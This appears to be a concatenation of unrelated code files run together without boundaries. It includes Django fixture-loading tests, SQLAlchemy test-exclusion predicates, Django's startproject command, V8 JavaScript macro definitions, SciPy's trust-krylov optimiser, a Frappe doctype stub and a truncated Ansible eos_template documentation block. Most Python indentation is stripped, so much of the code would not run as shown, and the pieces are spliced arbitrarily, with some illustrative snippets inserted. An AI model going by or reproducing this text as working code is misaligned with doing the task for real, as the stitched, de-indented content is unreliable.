management.call_command('loaddata', 'fixture5.json.zip', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: WoW subscribers now outnumber readers>',
])
def test_compressed_loading(self):
# Load fixture 5 (compressed), only compression specification
management.call_command('loaddata', 'fixture5.zip', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: WoW subscribers now outnumber readers>',
])
def test_ambiguous_compressed_fixture(self):
# The name "fixture5" is ambiguous, so loading it will raise an error
with self.assertRaises(management.CommandError) as cm:
management.call_command('loaddata', 'fixture5', verbosity=0)
self.assertIn("Multiple fixtures named 'fixture5'", cm.exception.args[0])
def test_db_loading(self):
# Load db fixtures 1 and 2. These will load using the 'default' database identifier implicitly
management.call_command('loaddata', 'db_fixture_1', verbosity=0)
management.call_command('loaddata', 'db_fixture_2', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Who needs more than one database?>',
'<Article: Who needs to use compressed data?>',
])
def test_loaddata_error_message(self):
"""
Loading a fixture which contains an invalid object outputs an error
message which contains the pk of the object that triggered the error.
"""
# MySQL needs a little prodding to reject invalid data.
# This won't affect other tests because the database connection
# is closed at the end of each test.
if connection.vendor == 'mysql':
connection.cursor().execute("SET sql_mode = 'TRADITIONAL'")
with self.assertRaises(IntegrityError) as cm:
management.call_command('loaddata', 'invalid.json', verbosity=0)
self.assertIn("Could not load fixtures.Article(pk=1):", cm.exception.args[0])
def test_loaddata_app_option(self):
with self.assertRaisesMessage(CommandError, "No fixture named 'db_fixture_1' found."):
management.call_command('loaddata', 'db_fixture_1', verbosity=0, app_label="someotherapp")
self.assertQuerysetEqual(Article.objects.all(), [])
management.call_command('loaddata', 'db_fixture_1', verbosity=0, app_label="fixtures")
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Who needs more than one database?>',
])
def test_loaddata_verbosity_three(self):
output = StringIO()
management.call_command('loaddata', 'fixture1.json', verbosity=3, stdout=output, stderr=output)
command_output = output.getvalue()
self.assertIn(
"\rProcessed 1 object(s).\rProcessed 2 object(s)."
"\rProcessed 3 object(s).\rProcessed 4 object(s).\n",
command_output
)
def test_loading_using(self):
# Load db fixtures 1 and 2. These will load using the 'default' database identifier explicitly
management.call_command('loaddata', 'db_fixture_1', verbosity=0, using='default')
management.call_command('loaddata', 'db_fixture_2', verbosity=0, using='default')
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Who needs more than one database?>',
'<Article: Who needs to use compressed data?>',
])
def test_unmatched_identifier_loading(self):
# Try to load db fixture 3. This won't load because the database identifier doesn't match
with self.assertRaisesMessage(CommandError, "No fixture named 'db_fixture_3' found."):
management.call_command('loaddata', 'db_fixture_3', verbosity=0)
with self.assertRaisesMessage(CommandError, "No fixture named 'db_fixture_3' found."):
management.call_command('loaddata', 'db_fixture_3', verbosity=0, using='default')
self.assertQuerysetEqual(Article.objects.all(), [])
def test_output_formats(self):
        # Load back in fixture 1; we need the articles from it.
management.call_command('loaddata', 'fixture1', verbosity=0)
# Try to load fixture 6 using format discovery
management.call_command('loaddata', 'fixture6', verbosity=0)
self.assertQuerysetEqual(Tag.objects.all(), [
'<Tag: <Article: Time to reform copyright> tagged "copyright">',
'<Tag: <Article: Time to reform copyright> tagged "law">'
], ordered=False)
# Dump the current contents of the database as a JSON fixture
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}, {"pk": 1, "model": '
'"fixtures.tag", "fields": {"tagged_type": ["fixtures", "article"], "name": "copyright", "tagged_id": '
'3}}, {"pk": 2, "model": "fixtures.tag", "fields": {"tagged_type": ["fixtures", "article"], "name": '
'"law", "tagged_id": 3}}, {"pk": 1, "model": "fixtures.person", "fields": {"name": "Django '
'Reinhardt"}}, {"pk": 2, "model": "fixtures.person", "fields": {"name": "Stephane Grappelli"}}, '
'{"pk": 3, "model": "fixtures.person", "fields": {"name": "Prince"}}]',
natural_foreign_keys=True
)
# Dump the current contents of the database as an XML fixture
self._dumpdata_assert(
['fixtures'],
'<?xml version="1.0" encoding="utf-8"?><django-objects version="1.0"><object pk="1" '
'model="fixtures.category"><field type="CharField" name="title">News Stories</field><field '
'type="TextField" name="description">Latest news stories</field></object><object pk="2" '
'model="fixtures.article"><field type="CharField" name="headline">Poker has no place on ESPN</field>'
'<field type="DateTimeField" name="pub_date">2006-06-16T12:00:00</field></object><object pk="3" '
'model="fixtures.article"><field type="CharField" name="headline">Time to reform copyright</field>'
'<field type="DateTimeField" name="pub_date">2006-06-16T13:00:00</field></object><object pk="1" '
'model="fixtures.tag"><field type="CharField" name="name">copyright</field><field '
'to="contenttypes.contenttype" name="tagged_type" rel="ManyToOneRel"><natural>fixtures</natural>'
'<natural>article</natural></field><field type="PositiveIntegerField" name="tagged_id">3</field>'
'</object><object pk="2" model="fixtures.tag"><field type="CharField" name="name">law</field><field '
'to="contenttypes.contenttype" name="tagged_type" rel="ManyToOneRel"><natural>fixtures</natural>'
'<natural>article</natural></field><field type="PositiveIntegerField" name="tagged_id">3</field>'
'</object><object pk="1" model="fixtures.person"><field type="CharField" name="name">Django Reinhardt'
'</field></object><object pk="2" model="fixtures.person"><field type="CharField" name="name">Stephane '
'Grappelli</field></object><object pk="3" model="fixtures.person"><field type="CharField" name="name">'
'Prince</field></object></django-objects>',
format='xml', natural_foreign_keys=True
)
def test_loading_with_exclude_app(self):
Site.objects.all().delete()
management.call_command('loaddata', 'fixture1', exclude=['fixtures'], verbosity=0)
self.assertFalse(Article.objects.exists())
self.assertFalse(Category.objects.exists())
self.assertQuerysetEqual(Site.objects.all(), ['<Site: example.com>'])
def test_loading_with_exclude_model(self):
Site.objects.all().delete()
management.call_command('loaddata', 'fixture1', exclude=['fixtures.Article'], verbosity=0)
self.assertFalse(Article.objects.exists())
self.assertQuerysetEqual(Category.objects.all(), ['<Category: News Stories>'])
self.assertQuerysetEqual(Site.objects.all(), ['<Site: example.com>'])
def test_exclude_option_errors(self):
"""Excluding a bogus app or model should raise an error."""
msg = "No installed app with label 'foo_app'."
with self.assertRaisesMessage(management.CommandError, msg):
management.call_command('loaddata', 'fixture1', exclude=['foo_app'], verbosity=0)
msg = "Unknown model: fixtures.FooModel"
with self.assertRaisesMessage(management.CommandError, msg):
management.call_command('loaddata', 'fixture1', exclude=['fixtures.FooModel'], verbosity=0)
class NonexistentFixtureTests(TestCase):
"""
Custom class to limit fixture dirs.
"""
def test_loaddata_not_existent_fixture_file(self):
stdout_output = StringIO()
with self.assertRaisesMessage(CommandError, "No fixture named 'this_fixture_doesnt_exist' found."):
management.call_command('loaddata', 'this_fixture_doesnt_exist', stdout=stdout_output)
@mock.patch('django.db.connection.enable_constraint_checking')
@mock.patch('django.db.connection.disable_constraint_checking')
def test_nonexistent_fixture_no_constraint_checking(
self, disable_constraint_checking, enable_constraint_checking):
"""
If no fixtures match the loaddata command, constraints checks on the
database shouldn't be disabled. This is performance critical on MSSQL.
"""
with self.assertRaisesMessage(CommandError, "No fixture named 'this_fixture_doesnt_exist' found."):
management.call_command('loaddata', 'this_fixture_doesnt_exist', verbosity=0)
disable_constraint_checking.assert_not_called()
enable_constraint_checking.assert_not_called()
class FixtureTransactionTests(DumpDataAssertMixin, TransactionTestCase):
available_apps = [
'fixtures',
'django.contrib.sites',
]
@skipUnlessDBFeature('supports_forward_references')
def test_format_discovery(self):
# Load fixture 1 again, using format discovery
management.call_command('loaddata', 'fixture1', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Time to reform copyright>',
'<Article: Poker has no place on ESPN>',
])
# Try to load fixture 2 using format discovery; this will fail
# because there are two fixture2's in the fixtures directory
with self.assertRaises(management.CommandError) as cm:
management.call_command('loaddata', 'fixture2', verbosity=0)
self.assertIn("Multiple fixtures named 'fixture2'", cm.exception.args[0])
# object list is unaffected
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Time to reform copyright>',
'<Article: Poker has no place on ESPN>',
])
# Dump the current contents of the database as a JSON fixture
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Load fixture 4 (compressed), using format discovery
management.call_command('loaddata', 'fixture4', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Django pets kitten>',
'<Article: Time to reform copyright>',
'<Article: Poker has no place on ESPN>',
])
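# Illustrative only: the loaddata -> dumpdata round trip the tests above rely
# on, reduced to its smallest form. 'fixture1.json' and the 'fixtures' app
# label are the ones used throughout this suite.
def _round_trip_demo():
    out = StringIO()
    management.call_command('loaddata', 'fixture1.json', verbosity=0)
    management.call_command('dumpdata', 'fixtures', format='json', stdout=out)
    return out.getvalue()  # JSON list of the objects just loaded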
import operator
from ..util import decorator
from . import config
from .. import util
import inspect
import contextlib
from sqlalchemy.util.compat import inspect_getargspec
def skip_if(predicate, reason=None):
rule = compound()
pred = _as_predicate(predicate, reason)
rule.skips.add(pred)
return rule
def fails_if(predicate, reason=None):
rule = compound()
pred = _as_predicate(predicate, reason)
rule.fails.add(pred)
return rule
class compound(object):
def __init__(self):
self.fails = set()
self.skips = set()
self.tags = set()
def __add__(self, other):
return self.add(other)
def add(self, *others):
copy = compound()
copy.fails.update(self.fails)
copy.skips.update(self.skips)
copy.tags.update(self.tags)
for other in others:
copy.fails.update(other.fails)
copy.skips.update(other.skips)
copy.tags.update(other.tags)
return copy
def not_(self):
copy = compound()
copy.fails.update(NotPredicate(fail) for fail in self.fails)
copy.skips.update(NotPredicate(skip) for skip in self.skips)
copy.tags.update(self.tags)
return copy
@property
def enabled(self):
return self.enabled_for_config(config._current)
def enabled_for_config(self, config):
for predicate in self.skips.union(self.fails):
if predicate(config):
return False
else:
return True
def matching_config_reasons(self, config):
return [
predicate._as_string(config) for predicate
in self.skips.union(self.fails)
if predicate(config)
]
def include_test(self, include_tags, exclude_tags):
return bool(
not self.tags.intersection(exclude_tags) and
(not include_tags or self.tags.intersection(include_tags))
)
def _extend(self, other):
self.skips.update(other.skips)
self.fails.update(other.fails)
self.tags.update(other.tags)
def __call__(self, fn):
if hasattr(fn, '_sa_exclusion_extend'):
fn._sa_exclusion_extend._extend(self)
return fn
@decorator
def decorate(fn, *args, **kw):
return self._do(config._current, fn, *args, **kw)
decorated = decorate(fn)
decorated._sa_exclusion_extend = self
return decorated
@contextlib.contextmanager
def fail_if(self):
all_fails = compound()
all_fails.fails.update(self.skips.union(self.fails))
try:
yield
except Exception as ex:
all_fails._expect_failure(config._current, ex)
else:
all_fails._expect_success(config._current)
def _do(self, cfg, fn, *args, **kw):
for skip in self.skips:
if skip(cfg):
msg = "'%s' : %s" % (
fn.__name__,
skip._as_string(cfg)
)
config.skip_test(msg)
try:
return_value = fn(*args, **kw)
except Exception as ex:
self._expect_failure(cfg, ex, name=fn.__name__)
else:
self._expect_success(cfg, name=fn.__name__)
return return_value
def _expect_failure(self, config, ex, name='block'):
for fail in self.fails:
if fail(config):
                print("%s failed as expected (%s): %s " % (
                    name, fail._as_string(config), str(ex)))
break
else:
util.raise_from_cause(ex)
def _expect_success(self, config, name='block'):
if not self.fails:
return
for fail in self.fails:
if not fail(config):
break
else:
raise AssertionError(
"Unexpected success for '%s' (%s)" %
(
name,
" and ".join(
fail._as_string(config)
for fail in self.fails
)
)
)
def requires_tag(tagname):
return tags([tagname])
def tags(tagnames):
comp = compound()
comp.tags.update(tagnames)
return comp
def only_if(predicate, reason=None):
predicate = _as_predicate(predicate)
return skip_if(NotPredicate(predicate), reason)
def succeeds_if(predicate, reason=None):
predicate = _as_predicate(predicate)
return fails_if(NotPredicate(predicate), reason)
class Predicate(object):
@classmethod
def as_predicate(cls, predicate, description=None):
if isinstance(predicate, compound):
return cls.as_predicate(predicate.enabled_for_config, description)
elif isinstance(predicate, Predicate):
if description and predicate.description is None:
predicate.description = description
return predicate
elif isinstance(predicate, (list, set)):
return OrPredicate(
[cls.as_predicate(pred) for pred in predicate],
description)
elif isinstance(predicate, tuple):
return SpecPredicate(*predicate)
elif isinstance(predicate, util.string_types):
tokens = predicate.split(" ", 2)
op = spec = None
db = tokens.pop(0)
if tokens:
op = tokens.pop(0)
if tokens:
spec = tuple(int(d) for d in tokens.pop(0).split("."))
return SpecPredicate(db, op, spec, description=description)
elif util.callable(predicate):
return LambdaPredicate(predicate, description)
else:
assert False, "unknown predicate type: %s" % predicate
    def _format_description(self, config, negate=False):
        bool_ = self(config)
        if negate:
            bool_ = not bool_
return self.description % {
"driver": config.db.url.get_driver_name()
if config else "<no driver>",
"database": config.db.url.get_backend_name()
if config else "<no database>",
"doesnt_support": "doesn't support" if bool_ else "does support",
"does_support": "does support" if bool_ else "doesn't support"
}
def _as_string(self, config=None, negate=False):
raise NotImplementedError()
class BooleanPredicate(Predicate):
def __init__(self, value, description=None):
self.value = value
self.description = description or "boolean %s" % value
def __call__(self, config):
return self.value
def _as_string(self, config, negate=False):
return self._format_description(config, negate=negate)
class SpecPredicate(Predicate):
def __init__(self, db, op=None, spec=None, description=None):
self.db = db
self.op = op
self.spec = spec
self.description = description
_ops = {
'<': operator.lt,
'>': operator.gt,
'==': operator.eq,
'!=': operator.ne,
'<=': operator.le,
'>=': operator.ge,
'in': operator.contains,
'between': lambda val, pair: val >= pair[0] and val <= pair[1],
}
def __call__(self, config):
engine = config.db
if "+" in self.db:
dialect, driver = self.db.split('+')
else:
dialect, driver = self.db, None
if dialect and engine.name != dialect:
return False
if driver is not None and engine.driver != driver:
return False
if self.op is not None:
assert driver is None, "DBAPI version specs not supported yet"
version = _server_version(engine)
            oper = self.op if callable(self.op) else self._ops[self.op]
return oper(version, self.spec)
else:
return True
def _as_string(self, config, negate=False):
if self.description is not None:
return self._format_description(config)
elif self.op is None:
if negate:
return "not %s" % self.db
else:
return "%s" % self.db
else:
if negate:
return "not %s %s %s" % (
self.db,
self.op,
self.spec
)
else:
return "%s %s %s" % (
self.db,
self.op,
self.spec
)
class LambdaPredicate(Predicate):
def __init__(self, lambda_, description=None, args=None, kw=None):
spec = inspect_getargspec(lambda_)
if not spec[0]:
self.lambda_ = lambda db: lambda_()
else:
self.lambda_ = lambda_
self.args = args or ()
self.kw = kw or {}
if description:
self.description = description
elif lambda_.__doc__:
self.description = lambda_.__doc__
else:
self.description = "custom function"
def __call__(self, config):
return self.lambda_(config)
def _as_string(self, config, negate=False):
return self._format_description(config)
class NotPredicate(Predicate):
def __init__(self, predicate, description=None):
self.predicate = predicate
self.description = description
def __call__(self, config):
return not self.predicate(config)
def _as_string(self, config, negate=False):
if self.description:
return self._format_description(config, not negate)
else:
return self.predicate._as_string(config, not negate)
class OrPredicate(Predicate):
def __init__(self, predicates, description=None):
self.predicates = predicates
self.description = description
def __call__(self, config):
for pred in self.predicates:
if pred(config):
return True
return False
def _eval_str(self, config, negate=False):
if negate:
conjunction = " and "
else:
conjunction = " or "
return conjunction.join(p._as_string(config, negate=negate)
for p in self.predicates)
def _negation_str(self, config):
if self.description is not None:
return "Not " + self._format_description(config)
else:
return self._eval_str(config, negate=True)
def _as_string(self, config, negate=False):
if negate:
return self._negation_str(config)
else:
if self.description is not None:
return self._format_description(config)
else:
return self._eval_str(config)
_as_predicate = Predicate.as_predicate
def _is_excluded(db, op, spec):
return SpecPredicate(db, op, spec)(config._current)
def _server_version(engine):
"""Return a server_version_info tuple."""
# force metadata to be retrieved
conn = engine.connect()
version = getattr(engine.dialect, 'server_version_info', ())
conn.close()
return version
def db_spec(*dbs):
return OrPredicate(
[Predicate.as_predicate(db) for db in dbs]
)
def open():
    return skip_if(BooleanPredicate(False, "marked as execute"))
def closed():
return skip_if(BooleanPredicate(True, "marked as skip"))
def fails(reason=None):
return fails_if(BooleanPredicate(True, reason or "expected to fail"))
@decorator
def future(fn, *arg):
return fails_if(LambdaPredicate(fn), "Future feature")
def fails_on(db, reason=None):
return fails_if(Predicate.as_predicate(db), reason)
def fails_on_everything_except(*dbs):
return succeeds_if(
OrPredicate([
Predicate.as_predicate(db) for db in dbs
])
)
def skip(db, reason=None):
return skip_if(Predicate.as_predicate(db), reason)
def only_on(dbs, reason=None):
return only_if(
OrPredicate([Predicate.as_predicate(db) for db in util.to_list(dbs)])
)
def exclude(db, op, spec, reason=None):
return skip_if(SpecPredicate(db, op, spec), reason)
def against(config, *queries):
assert queries, "no queries sent!"
return OrPredicate([
Predicate.as_predicate(query)
for query in queries
])(config)
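# Illustrative only: how the predicate grammar above composes. The string
# "postgresql >= 9.4" parses into SpecPredicate(db='postgresql', op='>=',
# spec=(9, 4)); evaluating a predicate needs a config whose .db engine
# exposes name/driver/server_version_info, so only construction is shown.
_example = _as_predicate("postgresql >= 9.4")
assert isinstance(_example, SpecPredicate)
assert (_example.db, _example.op, _example.spec) == ("postgresql", ">=", (9, 4))
_rule = skip_if(_example, "needs >= 9.4") + fails_if("mysql", "flaky here")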
from importlib import import_module
from django.core.management.base import CommandError
from django.core.management.templates import TemplateCommand
from ..utils import get_random_secret_key
class Command(TemplateCommand):
help = (
"Creates a Django project directory structure for the given project "
"name in the current directory or optionally in the given directory."
)
missing_args_message = "You must provide a project name."
def handle(self, **options):
project_name, target = options.pop('name'), options.pop('directory')
self.validate_name(project_name, "project")
# Check that the project_name cannot be imported.
try:
import_module(project_name)
except ImportError:
pass
else:
raise CommandError(
"%r conflicts with the name of an existing Python module and "
"cannot be used as a project name. Please try another name." % project_name
)
        # Create a random SECRET_KEY to put in the main settings.
options['secret_key'] = get_random_secret_key()
super().handle('project', project_name, target, **options)
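# Illustrative only (hypothetical helper, not part of Django): the
# import-collision check from handle() above, as a standalone function.
def _name_shadows_module(name):
    try:
        import_module(name)
    except ImportError:
        return False
    return True

# e.g. _name_shadows_module('os') is True, so 'os' is rejected as a project name.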
import os
# Run the adjacent "wpt" script with this directory as the working directory,
# so that its relative paths resolve against this file's location.
abspath = os.path.abspath(__file__)
os.chdir(os.path.dirname(abspath))
exec(compile(open("wpt", "r").read(), "wpt", 'exec'))
const NONE = 0;
const READ_ONLY = 1;
const DONT_ENUM = 2;
const DONT_DELETE = 4;
const GETTER = 0;
const SETTER = 1;
const kApiTagOffset = 0;
const kApiPropertyListOffset = 1;
const kApiSerialNumberOffset = 2;
const kApiConstructorOffset = 2;
const kApiPrototypeTemplateOffset = 5;
const kApiParentTemplateOffset = 6;
const kApiFlagOffset = 14;
const NO_HINT = 0;
const NUMBER_HINT = 1;
const STRING_HINT = 2;
const kFunctionTag = 0;
const kNewObjectTag = 1;
const HoursPerDay = 24;
const MinutesPerHour = 60;
const SecondsPerMinute = 60;
const msPerSecond = 1000;
const msPerMinute = 60000;
const msPerHour = 3600000;
const msPerDay = 86400000;
const msPerMonth = 2592000000;
const kUninitialized = -1;
const kReadOnlyPrototypeBit = 3; # For FunctionTemplateInfo, matches objects.h
const kInvalidDate = 'Invalid Date';
const kDayZeroInJulianDay = 2440588;
const kMonthMask = 0x1e0;
const kDayMask = 0x01f;
const kYearShift = 9;
const kMonthShift = 5;
const kMinYear = -1000000;
const kMaxYear = 1000000;
const kMinMonth = -10000000;
const kMaxMonth = 10000000;
const STRING_TO_REGEXP_CACHE_ID = 0;
macro IS_NULL(arg) = (arg === null);
macro IS_NULL_OR_UNDEFINED(arg) = (arg == null);
macro IS_UNDEFINED(arg) = (typeof(arg) === 'undefined');
macro IS_NUMBER(arg) = (typeof(arg) === 'number');
macro IS_STRING(arg) = (typeof(arg) === 'string');
macro IS_BOOLEAN(arg) = (typeof(arg) === 'boolean');
macro IS_OBJECT(arg) = (%_IsObject(arg));
macro IS_ARRAY(arg) = (%_IsArray(arg));
macro IS_FUNCTION(arg) = (%_IsFunction(arg));
macro IS_REGEXP(arg) = (%_IsRegExp(arg));
macro IS_SET(arg) = (%_ClassOf(arg) === 'Set');
macro IS_MAP(arg) = (%_ClassOf(arg) === 'Map');
macro IS_WEAKMAP(arg) = (%_ClassOf(arg) === 'WeakMap');
macro IS_DATE(arg) = (%_ClassOf(arg) === 'Date');
macro IS_NUMBER_WRAPPER(arg) = (%_ClassOf(arg) === 'Number');
macro IS_STRING_WRAPPER(arg) = (%_ClassOf(arg) === 'String');
macro IS_BOOLEAN_WRAPPER(arg) = (%_ClassOf(arg) === 'Boolean');
macro IS_ERROR(arg) = (%_ClassOf(arg) === 'Error');
macro IS_SCRIPT(arg) = (%_ClassOf(arg) === 'Script');
macro IS_ARGUMENTS(arg) = (%_ClassOf(arg) === 'Arguments');
macro IS_GLOBAL(arg) = (%_ClassOf(arg) === 'global');
macro IS_UNDETECTABLE(arg) = (%_IsUndetectableObject(arg));
macro FLOOR(arg) = $floor(arg);
macro IS_SPEC_OBJECT(arg) = (%_IsSpecObject(arg));
macro IS_SPEC_FUNCTION(arg) = (%_ClassOf(arg) === 'Function');
const kBoundFunctionIndex = 0;
const kBoundThisIndex = 1;
const kBoundArgumentsStartIndex = 2;
macro NUMBER_IS_NAN(arg) = (!%_IsSmi(%IS_VAR(arg)) && !(arg == arg));
macro NUMBER_IS_FINITE(arg) = (%_IsSmi(%IS_VAR(arg)) || ((arg == arg) && (arg != 1/0) && (arg != -1/0)));
macro TO_INTEGER(arg) = (%_IsSmi(%IS_VAR(arg)) ? arg : %NumberToInteger(ToNumber(arg)));
macro TO_INTEGER_MAP_MINUS_ZERO(arg) = (%_IsSmi(%IS_VAR(arg)) ? arg : %NumberToIntegerMapMinusZero(ToNumber(arg)));
macro TO_INT32(arg) = (%_IsSmi(%IS_VAR(arg)) ? arg : (arg >> 0));
macro TO_UINT32(arg) = (arg >>> 0);
macro TO_STRING_INLINE(arg) = (IS_STRING(%IS_VAR(arg)) ? arg : NonStringToString(arg));
macro TO_NUMBER_INLINE(arg) = (IS_NUMBER(%IS_VAR(arg)) ? arg : NonNumberToNumber(arg));
macro TO_OBJECT_INLINE(arg) = (IS_SPEC_OBJECT(%IS_VAR(arg)) ? arg : ToObject(arg));
macro JSON_NUMBER_TO_STRING(arg) = ((%_IsSmi(%IS_VAR(arg)) || arg - arg == 0) ? %_NumberToString(arg) : "null");
python macro CHAR_CODE(str) = ord(str[1]);
const REGEXP_NUMBER_OF_CAPTURES = 0;
const REGEXP_FIRST_CAPTURE = 3;
macro NUMBER_OF_CAPTURES(array) = ((array)[0]);
const MAX_TIME_MS = 8640000000000000;
const MAX_TIME_BEFORE_UTC = 8640002592000000;
macro CHECK_DATE(arg) = if (%_ClassOf(arg) !== 'Date') ThrowDateTypeError();
macro LOCAL_DATE_VALUE(arg) = (%_DateField(arg, 0) + %_DateField(arg, 21));
macro UTC_DATE_VALUE(arg) = (%_DateField(arg, 0));
macro LOCAL_YEAR(arg) = (%_DateField(arg, 1));
macro LOCAL_MONTH(arg) = (%_DateField(arg, 2));
macro LOCAL_DAY(arg) = (%_DateField(arg, 3));
macro LOCAL_WEEKDAY(arg) = (%_DateField(arg, 4));
macro LOCAL_HOUR(arg) = (%_DateField(arg, 5));
macro LOCAL_MIN(arg) = (%_DateField(arg, 6));
macro LOCAL_SEC(arg) = (%_DateField(arg, 7));
macro LOCAL_MS(arg) = (%_DateField(arg, 8));
macro LOCAL_DAYS(arg) = (%_DateField(arg, 9));
macro LOCAL_TIME_IN_DAY(arg) = (%_DateField(arg, 10));
macro UTC_YEAR(arg) = (%_DateField(arg, 11));
macro UTC_MONTH(arg) = (%_DateField(arg, 12));
macro UTC_DAY(arg) = (%_DateField(arg, 13));
macro UTC_WEEKDAY(arg) = (%_DateField(arg, 14));
macro UTC_HOUR(arg) = (%_DateField(arg, 15));
macro UTC_MIN(arg) = (%_DateField(arg, 16));
macro UTC_SEC(arg) = (%_DateField(arg, 17));
macro UTC_MS(arg) = (%_DateField(arg, 18));
macro UTC_DAYS(arg) = (%_DateField(arg, 19));
macro UTC_TIME_IN_DAY(arg) = (%_DateField(arg, 20));
macro TIMEZONE_OFFSET(arg) = (%_DateField(arg, 21));
macro SET_UTC_DATE_VALUE(arg, value) = (%DateSetValue(arg, value, 1));
macro SET_LOCAL_DATE_VALUE(arg, value) = (%DateSetValue(arg, value, 0));
const LAST_SUBJECT_INDEX = 1;
macro LAST_SUBJECT(array) = ((array)[1]);
macro LAST_INPUT(array) = ((array)[2]);
macro CAPTURE(index) = (3 + (index));
const CAPTURE0 = 3;
const CAPTURE1 = 4;
macro OVERRIDE_MATCH(override) = ((override)[0]);
macro OVERRIDE_POS(override) = ((override)[(override).length - 2]);
macro OVERRIDE_SUBJECT(override) = ((override)[(override).length - 1]);
macro OVERRIDE_CAPTURE(override, index) = ((override)[(index)]);
const IS_ACCESSOR_INDEX = 0;
const VALUE_INDEX = 1;
const GETTER_INDEX = 2;
const SETTER_INDEX = 3;
const WRITABLE_INDEX = 4;
const ENUMERABLE_INDEX = 5;
const CONFIGURABLE_INDEX = 6;
const TYPE_NATIVE = 0;
const TYPE_EXTENSION = 1;
const TYPE_NORMAL = 2;
const COMPILATION_TYPE_HOST = 0;
const COMPILATION_TYPE_EVAL = 1;
const COMPILATION_TYPE_JSON = 2;
const kNoLineNumberInfo = 0;
|
from ._trustregion import (_minimize_trust_region)
from ._trlib import (get_trlib_quadratic_subproblem)
__all__ = ['_minimize_trust_krylov']
def _minimize_trust_krylov(fun, x0, args=(), jac=None, hess=None, hessp=None,
inexact=True, **trust_region_options):
"""
Minimization of a scalar function of one or more variables using
a nearly exact trust-region algorithm that only requires matrix
vector products with the hessian matrix.
.. versionadded:: 1.0.0
Options
-------
inexact : bool, optional
Accuracy to solve subproblems. If True requires less nonlinear
iterations, but more vector products.
"""
    if jac is None:
        # Note: a comma here would build a tuple instead of one message
        # string, so the two parts are joined by implicit concatenation.
        raise ValueError('Jacobian is required for trust region '
                         'exact minimization.')
if hess is None and hessp is None:
raise ValueError('Either the Hessian or the Hessian-vector product '
'is required for Krylov trust-region minimization')
# tol_rel specifies the termination tolerance relative to the initial
# gradient norm in the Krylov subspace iteration.
# - tol_rel_i specifies the tolerance for interior convergence.
# - tol_rel_b specifies the tolerance for boundary convergence.
# in nonlinear programming applications it is not necessary to solve
# the boundary case as exact as the interior case.
# - setting tol_rel_i=-2 leads to a forcing sequence in the Krylov
# subspace iteration leading to quadratic convergence if eventually
# the trust region stays inactive.
# - setting tol_rel_b=-3 leads to a forcing sequence in the Krylov
# subspace iteration leading to superlinear convergence as long
# as the iterates hit the trust region boundary.
# For details consult the documentation of trlib_krylov_min
# in _trlib/trlib_krylov.h
#
# Optimality of this choice of parameters among a range of possibilities
# has been tested on the unconstrained subset of the CUTEst library.
if inexact:
return _minimize_trust_region(fun, x0, args=args, jac=jac,
hess=hess, hessp=hessp,
subproblem=get_trlib_quadratic_subproblem(
tol_rel_i=-2.0, tol_rel_b=-3.0,
disp=trust_region_options.get('disp', False)
),
**trust_region_options)
else:
return _minimize_trust_region(fun, x0, args=args, jac=jac,
hess=hess, hessp=hessp,
subproblem=get_trlib_quadratic_subproblem(
tol_rel_i=1e-8, tol_rel_b=1e-6,
disp=trust_region_options.get('disp', False)
),
**trust_region_options)
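# Usage sketch (assumption, not part of this module): this solver is normally
# reached through scipy.optimize.minimize with method='trust-krylov'; the
# Rosenbrock helpers used below ship with scipy.optimize.
if __name__ == '__main__':
    from scipy.optimize import minimize, rosen, rosen_der, rosen_hess_prod
    res = minimize(rosen, [2.0, 2.0], jac=rosen_der, hessp=rosen_hess_prod,
                   method='trust-krylov', options={'inexact': True})
    print(res.x)  # converges towards [1.0, 1.0]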
|
from __future__ import unicode_literals
from frappe.model.document import Document
class DosageStrength(Document):
pass
|
DOCUMENTATION = """
---
module: eos_template
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Manage Arista EOS device configurations
description:
- Manages network device configurations over SSH or eAPI. This module
allows implementors to work with the device running-config. It
provides a way to push a set of commands onto a network device
    by evaluating the current running-config and only pushing configuration
commands that are not already configured. The config source can
be a set of commands or a template.
extends_documentation_fragment: eos
options:
src:
description:
- The path to the config source. The source can be either a
file with config or a template that will be merged during
runtime. By default the task will search for the source
file in role or playbook root folder in templates directory.
required: true
force:
description:
      - The force argument instructs the module to not consider the
        current device's running-config. When set to true, this will
        cause the module to push the contents of I(src) into the device
        without first checking whether it is already configured.
required: false
default: false
choices: ['yes', 'no']
include_defaults:
description:
      - By default, when M(eos_template) connects to the remote
        device to retrieve the configuration, it issues the `show
        running-config` command. If this option is set to true, the
        issued command will be `show running-config all`.
required: false
default: false
choices: ['yes', 'no']
backup:
description:
- When this argument is configured true, the module will backup
the running-config from the node prior to making any changes.
The backup file will be written to backup_{{ hostname }} in
the root of the playbook directory.
required: false
default: false
choices: ['yes', 'no']
replace:
description:
      - This argument will cause the provided configuration to be replaced
        on the destination node. The use of the replace argument will
        always cause the task to set changed to true and implies
        I(force) is true. This argument is only valid when I(transport)
        is eapi.
required: false
default: false
choices: ['yes', 'no']
config:
description:
- The module, by default, will connect to the remote device and
retrieve the current running-config to use as a base for comparing
against the contents of source. There are times when it is not
desirable to have the task get the current running-config for
every task in a playbook. The I(config) argument allows the
        implementer to pass in the configuration to use as the base
        config for comparison.
required: false
default: null
"""
EXAMPLES = """
- name: push a configuration onto the device
eos_template:
src: config.j2
- name: forcibly push a configuration onto the device
eos_template:
src: config.j2
force: yes
- name: provide the base configuration for comparison
